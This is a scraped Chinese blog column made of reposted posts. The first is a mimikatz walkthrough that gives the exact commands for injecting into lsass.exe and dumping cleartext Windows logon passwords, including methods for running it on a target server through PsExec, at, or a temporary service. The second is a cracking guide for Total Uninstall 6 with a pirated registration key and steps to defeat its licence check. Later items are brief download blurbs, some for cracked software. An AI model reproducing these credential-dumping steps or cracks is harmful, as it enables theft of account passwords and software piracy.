ybds88的专栏

昨天有朋友发了个法国佬写的神器叫 mimikatz 让我们看下 神器下载地址: mimikatz_trunk.zip 还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章 http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass 自己尝试了下用 win2008 r2 x64 来测试 轻量级调试器神器 - mimikatz 最后测试成功 wdigest 就是我的明文密码 我还测过密码复杂度在14位以上 包含数字 大小写字母 特殊字符的密码 一样能抓出明文密码来 以前用 wce.exe 或 lslsass.exe 通常是只能从内存里顶多抓出active账号的 lm hash 和 ntlm hash 但用了这个神器抓出明文密码后 由此我们可以反推断 在 lsass.exe 里并不是只存有 lm hash 和 ntlm hash 而已 应该还存在有你的明文密码经过某种加密算法 (注意: 是加密算法 而不是hash算法 加密算法是可逆的 hash算法是不可逆的) 这样这个加密算法是可逆的 能被解密出明文 所以进程注入 lsass.exe 时 所调用的 sekurlsa.dll 应该包含了对应的解密算法 逆向功底比较好的童鞋可以尝试去逆向分析一下 然后这个神器的功能肯定不仅仅如此 在我看来它更像一个轻量级调试器 可以提升进程权限 注入进程 读取进程内存等等 下面展示一个 读取扫雷游戏的内存的例子 轻量级调试器神器 - mimikatz 我们还可以通过pause命令来挂起该进程 这个时候游戏的时间就静止了 轻量级调试器神器 - mimikatz 总之这个神器相当华丽 还有更多能力有待各黑阔们挖掘 =..=~ —————————– 站长评论： 抓取 lsass.exe 中的用户明文密码： //提升权限 privilege::debug //注入dll inject::process lsass.exe sekurlsa.dll //抓取密码 @getLogonPasswords 经测试，通杀： Windows Server 2003 Windows Server 2008 Windows Vista Windows 7 Windows 7 SP1 貌似只有 Windows 2000 与 Windows XP 无法使用。 不过，2000/xp 可以用以前的 FindPassword ，Windows 2003 – Windows 7 微软的这个处理机制没有变。 域也可以，理论上是没问题的，登录过都在 lsass.exe 里面。 原理就是登陆的时候输入的密码，经过 lsass.exe 里的 wdigest 和 tspkg 两个模块调用后，它们对之进行加密处理，而没有进行擦除，而且该加密通过特征可以定位，并且按照微软的算法可逆。 只要登陆过，就可以抓出来，它进行枚举的，这一切都是微软的错。 简单地说，在 Windows 中，当用户登录时，lsass.exe 使用一个可逆的算法，加密过的明文密码，并且把密文保存在内存中，没有清理，然后可以抓出来，还原。 也就是说，开机以后，只要是登陆过的用户，在没重启前（因为重启内存就清零了，这里不包括使用其他方法清理内存），都可以抓出来，注销也是无用的，因为内存中的密码并没有清除，所以还是可以抓出来的。 我想微软可能会出个补丁，清理这块…… 这玩意儿功能还有很多，自己看看参数，例如：ts，是调用 mimikatz.sys 隐藏登陆的终端。 这应该算是密码泄露，很严重的漏洞，估计微软会出补丁。 —————————– 在远程终端（3389、mstsc.exe）、虚拟桌面中抓取密码的方法： 通常你在远程终端中运行该程序会提示：存储空间不足，无法处理此命令。 这是因为在终端模式下，不能插入远线程，跨会话不能注入，你需要使用如下方法执行该程序： 首先提取几个文件，只抓取密码的话，只需要这几个文件： mimikatz_trunk\tools\PsExec.exe mimikatz_trunk\Win32\mimikatz.exe mimikatz_trunk\Win32\sekurlsa.dll 打包后上传至目标服务器，然后解压释放，注意路径中绝对不能有中文（可以有空格）！否则加载DLL的时候会报错：找不到文件。 然后使用以下任何一种方法即可抓取密码： //最简单实用的方法，使用 PsExec.exe 启动。 //在本机启动交互式命令提示窗口 psexec \\127.0.0.1 cmd.exe //启动 mimikatz.exe C:\mimikatz_trunk\Win32\mimikatz.exe //提升权限 privilege::debug //注入dll，要用绝对路径！并且路径中绝对不能有中文（可以有空格）！ inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll" //抓取密码 @getLogonPasswords //退出，不要用 ctrl + c，会导致 mimikatz.exe CPU 占用达到 100%，死循环。 exit //********************************************************* //使用 At 启动 at *** //********************************************************* //创建服务方法 sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt" sc start getpassword sc delete getpassword //********************************************************* //telnet 远程命令管道 telnet **** —————————– 部分内容转自：http://hi.baidu.com/hackercasper/blog/item/b080dbd05eb6a5cc562c8461.html

这款名为 Total Uninstall （中文名：完美卸载）的软件似乎早已名闻于世，只是一直未曾使用过。刚刚研究了半天，总算基本全部搞懂了，把自己摸索学习到的分享出来。当然首先最关心的还是Total Uninstall 6.x的注册问题，因为它并不是免费软件，在此提供可用注册码，并且辅以破解方法，亲测完美！另外，遇到“注册失败：强制网络访问”的问题也解决了。 　　Total Uninstall 目前最新版本为6.2.2，它是一款非常优秀的软件卸载工具，但是说实话，本人从来不用第三方工具来卸载系统内的软件或程序，都是用软件本身自带的卸载程序或者Windows控制面板里的“程序和功能”。直到今天早上试用了Total Uninstall，发现真是好用，真的是完全彻底卸载！不留任何垃圾文件，强烈推荐！但是从今天的测试来看发现它还是有小BUG的，暂且不讨论它的使用方法和技巧，这部份内容会另外单独发文，本文主要讲解如何安装与注册。 　　去官方看了下，对它的简介如下： 1、让卸载任何程序删除变得更加容易。准确的分析安装的程序并完全卸载它们。“安装程序”模块的总卸载安装的程序进行分析，并创建安装日志。这是用来做一个完整的帮助下，即使没有提供标准卸载从添加删除程序卸载。 2、可监视新安装的程序。“监控程序”模块，它可以监视到你的系统中安装一个新的程序所做的任何更改。它可以让你执行一个完整的卸载，而不必依赖于所提供的添加删除程序，它可以给后面的文件或更改。 　　最新版为6.2.2，不过可惜还用不了，因为破解是针对上一个版本6.2.1的，不过没什么。我看了新版本的更新内容，一是增加俄罗斯，波兰和印度尼西亚的语言支持；二是改进分析安装的程序；三是改进清洁扫描。 Total Uninstall 6 注册开始…… 以上的基本都是废话，你可以无视，现在正式开始破解注册。 1、下载。 下载地址在文章最后面，保证官方原版，自带简体中文。 2、安装。 这里千万要注意，一定要在断网的情况下安装！！可以学我一样，暂时把网络连接禁用。安装过程没什么好讲的，一路Next。 3、注册。 保证断网状态，运行程序，点击菜单栏“帮助”-“注册”， 注册名：随便取，别用中文就行。 注册码：59552RW-OP0BF01-MC3ACYR7-SFU36DYH-OBPZLFFM-IW6XZTXX-7IYCYAQU-ARCIUONY-72DVI7RZ-X5M2Y6R4-3PQFCCGR-AIKGC7XB-AZY7IZAZ-UWS6NAFT-USDSYWEA-4KYAIBJH 提示感谢您注册，成功了！如下图： 但不要以为就这么简单，否则也不用写方法了，关键在下面。 4、禁止自动升级。 如果就像以上所述，等你开网后程序会自动更新，破解将失效。所以想做到永久免费使用它，必须关闭它的自动升级。打开“工具”-“选项”，来到“常规设置”，郁闷，“检查更新方式”和“频率”都是灰色不可选的，并且自动设成了自动升级和每天。 这也不难理解，官方总有它的措施。所以关键就在这里了：如何屏蔽它联网更新。我看到网上有方法是修改Program Options.xml文件，还有利用防火墙阻止Tu.exe访问网络的。行不行我不知道，没有去试，但是iHackSoft.com有个更简单的方法提供给大家。 下载包里我放了一个名为“Total Uninstall 6.2.1设置”的小程序，退出Total Uninstall，将它拖到安装目录里执行，直接点击“更改联网配置”，会提示成功。此时重新打开Total Uninstall，发现语言变成了英文。去“工具-选项-界面-语言”重新设置成简体中文即可。破解完成，现在可以重新连网了。 此程序的原理我没有猜错的话就是上述的手工修改配置文件，有兴趣的可以了解一下： 用记事本打开Program Options.xml文件， XP：C:\Documents and Settings\All Users\Application Data\Martau\Total Uninstall 6\Program Options.xml Windows 7：C:\ProgramData\Martau\Total Uninstall 6\Program Options.xml 在文件中搜索“RegName”和“RegKey”，将用户名和注册码末尾3位字母随意修改一个（如把iHackSoft.com改成了iHackSoft.cn，注册码最后的字母H改成了W等）。这样就可以不用设置防火墙拦截了，运行Total Uninstall联网也没有任何问题。 注意事项 1、运行Total Uninstall 6.2设置小程序后，原来注册时使用的用户名变成了every kafan，此时不要傻乎乎地重新键入任意用户名和上面的注册码进行注册，我试了，会提示错误，注册失败：强制网络访问。如果真心要修改用户名，那就进上述的Program Options.xml文件修改RegName，我刚试了，没有问题。 2、此方法适用于没有安装过Total Uninstall的电脑，像我本机就不行了，因为我为了测试做了上面的操作导致注册失败过，之后无论我怎么卸载掉重新安装和注册，都不行了。它是以什么信息来标识每台机器，尚不清楚，待进一步探究。 来源：http://www.ihacksoft.com/total-uninstall-6.html 笔者加了注册失败的解决办法

今天早晨突然冤孽了，我的域名说什么就是打不开，可以ping通，tracert也可以正常访问 但就是打不开网站，估计是污染了。喵了个咪的 下面是解决办法 DNS污染和DNS劫持在天朝是非常常见的现象。 输入了一个错误的URL后，本应该出现的404页面却是电信114， 正常访问网站时出现的电信的小广告， 使用了代理却依然无法正常访问某些境外网站， 以及最近爆出来的Gmail钓鱼页面， 这些都是遭到DNS污染和DNS劫持的现象。 以下提供两种方法解决这个问题： 1.Firefox only用户 如果你只用Firefox又懒得折腾，直接打开Firefox的远程DNS解析就行了。 在地址栏中输入about:config 找到network.proxy.socks_remote_dns一项改成true。 2.通用解决方法 这种方法更为彻底，保证所有网络程序都能获得正确的DNS解析。 http://code.google.com/p/pydnsproxy/ 到以上地址下载DNS Proxy这一程序，安装（Vista/Win7需要以管理员身份运行）。 然后修改你的网络适配器设置（根据你的上网方式选择适配器），把DNS服务器地址手动指定为127.0.0.1，即本机地址。 程序默认使用OpenDNS，可以修改安装目录下的dnsserver.conf选用你自己喜欢的境外DNS服务器，比如Google DNS 8.8.8.8。 (1)错误的地址，返回干净的404错误页面（我改成了Google DNS，默认的OpenDNS也会重定向到它自己的页面） (2)在我这里，因为DNS污染的原因，就算通过代理服务器，也无法正常访问twitter，安装DNS Proxy后能正常访问了（当然需要代理）。

Java最重要的特性之一就是给程序提供跨平台的能力，使得代码一次编写即可在不同的操作系统上运行。当然，前提是在这里不同的操作系统上都需要事先安装好Java的运行环境，即JRE。简单地说，JRE是用来解释程序员写出来的Java代码并翻译成当前使用的操作系统能识别的语言再运行，这样就能在不修改Java代码的前提下，在不同的操作系统上均能顺利执行了。JRE有多种操作系统的版本，请根据自己的实际使用的系统来选择下载。

DocFetcher 跟 Google Desktop 和 百度硬盘搜索 的原理一样，都是需要事先对硬盘上的文件内容进行索引。然而，它比 Google Desktop 好的地方就是可以由用户指定索引的文件夹和文件格式。由于 Google Desktop 和 百度硬盘搜索 等进行全硬盘的全文索引实在太太太太太慢了，而且很久都没更新了 (估计都被官方抛弃了)。DocFetcher 虽然速度上比它们没有多少优势，但却可以把目录设置到你最常存放文档的文件夹而不是索引整个磁盘，当然这样就相当于变相提高索引速度了。DocFetcher 另外一个优势是索引数据比较小，不像 Google Desktop 那样，扫描完之后索引文件很容易就上几个G了。

一个很好用的，适用于ros3.30的中文版管理软件 winbox 中英文版本

屏幕录像专家破解版（仅供研究使用 请勿用于其他用途）比较好用的一款屏幕录像软件

VMware_WorkstationV7.1.3_汉化破解版 个人长期使用的一个虚拟机版本，最新的9.x版本体积很大了 很大功能用不上

EditPlus 3增强版的文本编辑工具（代码 颜色分类） 比windows自带的记事本好用多了

1.一些文件目录说明 以下是两个不同的客户端 colinux-console-nt.exe colinux-console-fltk.exe 主程序、服务程序 colinux-daemon.exe 虚拟网络服务程序 colinux-slirp-net-daemon.exe 2. 为了方便使用建议安装为服务，使用<安装服务.cmd> 然后可以通过以下命令来手工启动服务 net start <server> 然后可以选择一个你喜欢的控制台来使用。 colinux-console-nt.exe colinux-console-fltk.exe 如果你习惯了WINDOWS下的操作，可以把源码下载到cofs目录中， 先在WINDOWS的D盘根目录下建立一个文件夹cofs cd /mnt/cofs svn co http://grub4dos-chenall.googlecode.com/svn/trunk grub4dos_src 这样就可以直接在windows中修改(在shared目录里面) 然后在linux里面编译了 cd /mnt/cofs/grub4dos_src ./build 建议使用notepad2或其它的增强编辑器来修改源码。 编译外部程序也是一样的。

ChipGenius_v4芯片无忧检查u盘主控和闪存芯片工具，用于检测u盘主控芯片，避免买到黑盘等 和量产u盘使用

Cisco TFTP Server.rar 思考出品的一款非常好用的工具 刷路由 玩linux 必备

ros v5的中文版本教程，ros是一款非常强大的软路由，这个教程非常详细。

diskid32 获取任意硬盘的序列号 GetHardId 这3个都是获取磁盘 硬盘 物理序列号工具 SMBIOS dos系统查看主板序列号 cpu id的

putty 很好用的一个工具 玩linux 路由等必备

R-Studio 是世界上比较有名的一款数据恢复软件，如果你错误删除数据、格式化硬盘等需要恢复数据可以使用这款软件。

该程序实现了可以获取人一硬盘序列好的功能，有心去大家可以用一下，我觉得很好

获取硬盘序列号的方法很多种，但是大多不是很通用，获取序列号成功率不高，本资源的方法经过了不同机型的大量测试均能正确获取硬盘序列号。

中文版本的md5 效验工具，主要是防止下载的资源是被修改过的，比如植入木马的软件。